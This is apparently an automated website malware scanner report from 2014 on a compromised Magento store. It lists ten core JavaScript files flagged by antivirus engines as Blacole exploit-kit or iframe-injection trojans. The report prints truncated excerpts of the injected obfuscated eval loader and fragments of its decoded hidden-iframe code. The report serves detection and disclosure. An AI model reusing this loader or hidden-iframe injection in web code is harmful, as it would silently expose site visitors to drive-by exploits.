Malware Scanner report for emarketingleonardo.com

Malicious/Suspicious/Total urls checked: 10/0/16

10 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "emarketingleonardo.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=emarketingleonardo.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://emarketingleonardo.com/	HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 03 Aug 2014 08:44:14 GMT Location: http://emarketingleonardo.com/magento/ Server: Apache Vary: Accept-Encoding Content-Length: 318 Content-Type: text/html; charset=iso-8859-1	clean
http://emarketingleonardo.com/magento/	200 OK Content-Length: 18346 Content-Type: text/html	clean
http://emarketingleonardo.com/magento/js/prototype/prototype.js	200 OK Content-Length: 137401 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var Prototype = { Version: '1.6.0.3', Browser: { IE: !!(window.attachEvent && navigator.userAgent.indexOf('Opera') === -1), Opera: navigator.userAgent.indexOf('Opera') > -1, WebKit: navigator.userAgent.indexOf('AppleWebKit/') > -1, Gecko: navigator.userAgent.indexOf('Gecko') > -1 && navigator.userAgent.indexOf('KHTML') === -1, MobileSafari: !!navigator.userAgent.match(/Apple.Mobile.Safari/)... 3273 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} Antivirus reports: AntiVir JS/Blacole.EB.24 Avast JS:Iframe-CWV [Trj] Ad-Aware Exploit.JS.Blacole.BT Ikarus Exploit.JS.Blacole Panda JS/JavaBlacole.A nProtect Exploit.JS.Blacole.BT Emsisoft Exploit.JS.Blacole.BT (B) CAT-QuickHeal JS/BlacoleRef.BV K7GW Exploit ( 04c5558f1 ) McAfee-GW-Edition JS/Exploit-Blacole.hd DrWeb JS.IFrame.278 Microsoft Trojan:JS/BlacoleRef.BX Kaspersky Trojan-Downloader.JS.Iframe.czf MicroWorld-eScan Exploit.JS.Blacole.BT Fortinet JS/Iframe.W!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.hd NANO-Antivirus Trojan.Script.Expack.uvpsi ClamAV JS.Trojan.Blacole-5 F-Secure Exploit.JS.Blacole.BT AVG HTML/Framer Norman Blacole.HB Sophos Mal/Iframe-AF GData Exploit.JS.Blacole.BT BitDefender Exploit.JS.Blacole.BT
http://emarketingleonardo.com/magento/js/lib/ccard.js	200 OK Content-Length: 8188 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function validateCreditCard(s) { var v = "0123456789"; var w = ""; for (i=0; i < s.length; i++) { x = s.charAt(i); if (v.indexOf(x,0) != -1) w += x; } j = w.length / 2; k = Math.floor(j); m = Math.ceil(j) - k; c = 0; for (i=0; i<k; i++) { a = w.charAt(i2+m) 2; c += a > 9 ? Math.floor(a/10 + a%10) : a; } for (i=0; i<k+m; i++) c ... 3094 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ... 32997 bytes are skipped ... ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports: nProtect JS:Trojan.Iframer.C K7AntiVirus Trojan Emsisoft JS:Trojan.Iframer.C (B) Kaspersky HEUR:Trojan.Script.Iframer Microsoft Trojan:JS/Iframeinject.AB MicroWorld-eScan JS:Trojan.Iframer.C F-Secure JS:Trojan.Iframer.C F-Prot JS/IFrame.QW GData JS:Trojan.Iframer.C Commtouch JS/IFrame.QW BitDefender JS:Trojan.Iframer.C
http://emarketingleonardo.com/magento/js/prototype/validation.js	200 OK Content-Length: 44620 Content-Type: application/javascript	clean
http://emarketingleonardo.com/magento/js/scriptaculous/builder.js	200 OK Content-Length: 12185 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var Builder = { NODEMAP: { AREA: 'map', CAPTION: 'table', COL: 'table', COLGROUP: 'table', LEGEND: 'fieldset', OPTGROUP: 'select', OPTION: 'select', PARAM: 'object', TBODY: 'table', TD: 'table', TFOOT: 'table', TH: 'table', THEAD: 'table', TR: 'table' }, node: function(elementName) { elementName = elementName.toUpperCase(); var parentTag = this ... 3259 bytes are skipped ...50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} /qhk6sa6g1c/ Antivirus reports: nProtect JS:Trojan.Iframer.C K7AntiVirus Trojan Emsisoft JS:Trojan.Iframer.C (B) Kaspersky HEUR:Trojan.Script.Iframer Microsoft Trojan:JS/Iframeinject.AB MicroWorld-eScan JS:Trojan.Iframer.C F-Secure JS:Trojan.Iframer.C F-Prot JS/IFrame.QW GData JS:Trojan.Iframer.C Commtouch JS/IFrame.QW BitDefender JS:Trojan.Iframer.C
http://emarketingleonardo.com/magento/js/scriptaculous/effects.js	200 OK Content-Length: 46186 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) String.prototype.parseColor = function() { var color = '#'; if (this.slice(0,4) == 'rgb(') { var cols = this.slice(4,this.length-1).split(','); var i=0; do { color += parseInt(cols[i]).toColorPart() } while (++i<3); } else { if (this.slice(0,1) == '#') { if (this.length==4) for(var i=1;i<4;i++) color += (this.charAt(i) + this.charAt(i)).toLowerCase(); if (this.length==7) color = this.toLowerCase(); } } return ... 3235 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} Antivirus reports: Qihoo-360 Trojan.Generic AntiVir JS/Blacole.EB.24 Avast JS:Iframe-CWV [Trj] Ad-Aware Exploit.JS.Blacole.BT Ikarus Exploit.JS.Blacole Panda JS/JavaBlacole.A nProtect Exploit.JS.Blacole.BT K7AntiVirus Exploit ( 04c5558f1 ) Emsisoft Exploit.JS.Blacole.BT (B) Comodo TrojWare.JS.Agent.AM CAT-QuickHeal JS/BlacoleRef.BV K7GW Exploit ( 04c5558f1 ) McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.278 Microsoft Trojan:JS/BlacoleRef.BX Kaspersky Trojan-Downloader.JS.Iframe.czf Tencent Js.Trojan-downloader.Iframe.Wozj MicroWorld-eScan Exploit.JS.Blacole.BT Fortinet JS/Iframe.W!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.uvpsi ClamAV JS.Trojan.Blacole-4 F-Secure Exploit.JS.Blacole.BT F-Prot JS/IFrame.QW AVG HTML/Framer Norman Blacole.HB Sophos Mal/Iframe-AF GData Exploit.JS.Blacole.BT Commtouch JS/IFrame.QW BitDefender Exploit.JS.Blacole.BT
http://emarketingleonardo.com/magento/js/scriptaculous/dragdrop.js	200 OK Content-Length: 38633 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) if(Object.isUndefined(Effect)) throw("dragdrop.js requires including script.aculo.us' effects.js library"); var Droppables = { drops: [], remove: function(element) { this.drops = this.drops.reject(function(d) { return d.element==$(element) }); }, add: function(element) { element = $(element); var options = Object.extend({ greedy: true, hoverclass: null, tree: false }, arguments[1] \|\| { });... 3260 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} Antivirus reports: Qihoo-360 Trojan.Generic AntiVir JS/Blacole.EB.24 Avast JS:Iframe-CWV [Trj] Ad-Aware Exploit.JS.Blacole.BT Ikarus Exploit.JS.Blacole Panda JS/JavaBlacole.A nProtect Exploit.JS.Blacole.BT K7AntiVirus Exploit ( 04c5558f1 ) Emsisoft Exploit.JS.Blacole.BT (B) Comodo TrojWare.JS.Agent.AM CAT-QuickHeal JS/BlacoleRef.BV K7GW Exploit ( 04c5558f1 ) McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.278 Microsoft Trojan:JS/BlacoleRef.BX Kaspersky Trojan-Downloader.JS.Iframe.czf Tencent Js.Trojan-downloader.Iframe.Eadu MicroWorld-eScan Exploit.JS.Blacole.BT Fortinet JS/Iframe.W!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.uvpsi ClamAV JS.Trojan.Blacole-4 F-Secure Exploit.JS.Blacole.BT F-Prot JS/IFrame.QW AVG HTML/Framer Norman Blacole.HB Sophos Mal/Iframe-AF GData Exploit.JS.Blacole.BT Commtouch JS/IFrame.QW BitDefender Exploit.JS.Blacole.BT
http://emarketingleonardo.com/magento/js/scriptaculous/controls.js	200 OK Content-Length: 42238 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) if(typeof Effect == 'undefined') throw("controls.js requires including script.aculo.us' effects.js library"); var Autocompleter = { }; Autocompleter.Base = Class.create({ baseInitialize: function(element, update, options) { element = $(element); this.element = element; this.update = $(update); this.hasFocus = false; this.changed = false; this.active = false; this.index = 0; thi ... 3182 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} Antivirus reports: Qihoo-360 Trojan.Generic AntiVir JS/Blacole.EB.24 Avast JS:Iframe-CWV [Trj] Ad-Aware Exploit.JS.Blacole.BT Ikarus Exploit.JS.Blacole Panda JS/JavaBlacole.A nProtect Exploit.JS.Blacole.BT K7AntiVirus Exploit ( 04c5558f1 ) Emsisoft Exploit.JS.Blacole.BT (B) Comodo TrojWare.JS.Agent.AM CAT-QuickHeal JS/BlacoleRef.BV K7GW Exploit ( 04c5558f1 ) McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.278 Microsoft Trojan:JS/BlacoleRef.BX Kaspersky Trojan-Downloader.JS.Iframe.czf MicroWorld-eScan Exploit.JS.Blacole.BT Tencent Js.Trojan-downloader.Iframe.Ssqi Fortinet JS/Iframe.W!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.uvpsi ClamAV JS.Trojan.Blacole-5 F-Secure Exploit.JS.Blacole.BT F-Prot JS/IFrame.QW AVG HTML/Framer Norman Blacole.HB Sophos Mal/Iframe-AF GData Exploit.JS.Blacole.BT Commtouch JS/IFrame.QW BitDefender Exploit.JS.Blacole.BT
http://emarketingleonardo.com/magento/js/scriptaculous/slider.js	200 OK Content-Length: 17772 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) if (!Control) var Control = { }; Control.Slider = Class.create({ initialize: function(handle, track, options) { var slider = this; if (Object.isArray(handle)) { this.handles = handle.collect( function(e) { return $(e) }); } else { this.handles = [$(handle)]; } this.track = $(track); this.options = options \|\| { }; this.axis = this.options.axis \|\| 'horizontal'; this.increment = this.options.increme ... 3153 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} Antivirus reports: Qihoo-360 Trojan.Generic AntiVir JS/Blacole.EB.24 Avast JS:Iframe-CWV [Trj] Ad-Aware Exploit.JS.Blacole.BT Ikarus Trojan.Script Panda JS/JavaBlacole.A nProtect Exploit.JS.Blacole.BT K7AntiVirus Exploit ( 04c5558f1 ) Emsisoft Exploit.JS.Blacole.BT (B) Comodo TrojWare.JS.Agent.AM CAT-QuickHeal JS/BlacoleRef.BV K7GW Exploit ( 04c5558f1 ) McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.278 Microsoft Trojan:JS/BlacoleRef.BX Kaspersky Trojan-Downloader.JS.Iframe.czf MicroWorld-eScan Exploit.JS.Blacole.BT Fortinet JS/Iframe.W!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.uvpsi ClamAV JS.Trojan.Blacole-4 F-Secure Exploit.JS.Blacole.BT F-Prot JS/IFrame.QW AVG HTML/Framer Norman Blacole.HB Sophos Mal/Iframe-AF GData Exploit.JS.Blacole.BT Commtouch JS/IFrame.QW BitDefender Exploit.JS.Blacole.BT
http://emarketingleonardo.com/magento/js/varien/js.js	200 OK Content-Length: 25673 Content-Type: application/javascript	clean
http://emarketingleonardo.com/magento/js/varien/form.js	200 OK Content-Length: 19155 Content-Type: application/javascript	clean
http://emarketingleonardo.com/magento/js/varien/menu.js	200 OK Content-Length: 11867 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var mainNav = function() { var main = { obj_nav : $(arguments[0]) \|\| $("nav"), settings : { show_delay : 0, hide_delay : 0, _ie6 : /MSIE 6.+Win/.test(navigator.userAgent), _ie7 : /MSIE 7.+Win/.test(navigator.userAgent) }, init : function(obj, level) { obj.lists = obj.childElements(); obj.lists.each(func ... 3225 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} Antivirus reports: Qihoo-360 Trojan.Generic AntiVir JS/Blacole.EB.24 Avast JS:Iframe-CWV [Trj] Ad-Aware Exploit.JS.Blacole.BT Ikarus Exploit.JS.Blacole Panda JS/JavaBlacole.A nProtect Exploit.JS.Blacole.BT K7AntiVirus Exploit ( 04c5558f1 ) Emsisoft Exploit.JS.Blacole.BT (B) Comodo TrojWare.JS.Agent.AM CAT-QuickHeal JS/BlacoleRef.BV K7GW Exploit ( 04c5558f1 ) McAfee-GW-Edition JS/Exploit-Blacole.hd DrWeb JS.IFrame.278 Microsoft Trojan:JS/BlacoleRef.BX Kaspersky Trojan-Downloader.JS.Iframe.czf Tencent Js.Trojan-downloader.Iframe.Htvp MicroWorld-eScan Exploit.JS.Blacole.BT Fortinet JS/Iframe.W!tr McAfee JS/Exploit-Blacole.hd NANO-Antivirus Trojan.Script.Expack.uvpsi ClamAV JS.Trojan.Blacole-4 F-Secure Exploit.JS.Blacole.BT F-Prot JS/IFrame.QW AVG HTML/Framer Norman Blacole.HB Sophos Mal/Iframe-AF GData Exploit.JS.Blacole.BT Commtouch JS/IFrame.QW BitDefender Exploit.JS.Blacole.BT
http://emarketingleonardo.com/magento/js/mage/translate.js	200 OK Content-Length: 9038 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var Translate = Class.create(); Translate.prototype = { initialize: function(data){ this.data = $H(data); }, translate : function(){ var args = arguments; var text = arguments[0]; if(this.data.get(text)){ return this.data.get(text); } return text; }, add : function() { if (arguments.length > 1) { this.data.set(arguments[0], arguments[1 ... 3100 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} Antivirus reports: Qihoo-360 Trojan.Generic AntiVir JS/Blacole.EB.24 Avast JS:Iframe-CWV [Trj] Ad-Aware Exploit.JS.Blacole.BT Ikarus Exploit.JS.Blacole Panda JS/JavaBlacole.A nProtect Exploit.JS.Blacole.BT K7AntiVirus Exploit ( 04c5558f1 ) Emsisoft Exploit.JS.Blacole.BT (B) Comodo TrojWare.JS.Agent.AM CAT-QuickHeal JS/BlacoleRef.BV K7GW Exploit ( 04c5558f1 ) McAfee-GW-Edition JS/Exploit-Blacole.hd DrWeb JS.IFrame.278 Microsoft Trojan:JS/BlacoleRef.BX Kaspersky Trojan-Downloader.JS.Iframe.czf MicroWorld-eScan Exploit.JS.Blacole.BT Fortinet JS/Iframe.W!tr McAfee JS/Exploit-Blacole.hd NANO-Antivirus Trojan.Script.Expack.uvpsi ClamAV JS.Trojan.Blacole-4 F-Secure Exploit.JS.Blacole.BT F-Prot JS/IFrame.QW AVG HTML/Framer Norman Blacole.HB Sophos Mal/Iframe-AF GData Exploit.JS.Blacole.BT Commtouch JS/IFrame.QW BitDefender Exploit.JS.Blacole.BT
http://emarketingleonardo.com/magento/js/mage/cookies.js	200 OK Content-Length: 10056 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) if (!window.Mage) var Mage = {}; Mage.Cookies = {}; Mage.Cookies.expires = null; Mage.Cookies.path = '/'; Mage.Cookies.domain = null; Mage.Cookies.secure = false; Mage.Cookies.set = function(name, value){ var argv = arguments; var argc = arguments.length; var expires = (argc > 2) ? argv[2] : Mage.Cookies.expires; var path = (argc > 3) ? argv[3] : Mage.Cookies.path; var domain = (argc > 4) ? argv[4] : Mage.Cook ... 3210 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ... 32997 bytes are skipped ... ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports: nProtect JS:Trojan.Iframer.C K7AntiVirus Trojan Emsisoft JS:Trojan.Iframer.C (B) Kaspersky HEUR:Trojan.Script.Iframer Microsoft Trojan:JS/Iframeinject.AB MicroWorld-eScan JS:Trojan.Iframer.C F-Secure JS:Trojan.Iframer.C F-Prot JS/IFrame.QW GData JS:Trojan.Iframer.C Commtouch JS/IFrame.QW BitDefender JS:Trojan.Iframer.C
http://emarketingleonardo.com/magento/index.php/	200 OK Content-Length: 18346 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: emarketingleonardo.com

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 03 Aug 2014 08:44:14 GMT
Location: http://emarketingleonardo.com/magento/
Server: Apache
Vary: Accept-Encoding
Content-Length: 318
Content-Type: text/html; charset=iso-8859-1

...318 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: emarketingleonardo.com
Referer: http://www.google.com/search?q=emarketingleonardo.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for emarketingleonardo.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools